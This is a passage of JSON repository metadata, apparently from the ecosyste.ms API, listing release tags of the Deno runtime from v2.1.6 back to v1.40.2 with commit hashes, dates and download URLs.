/repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_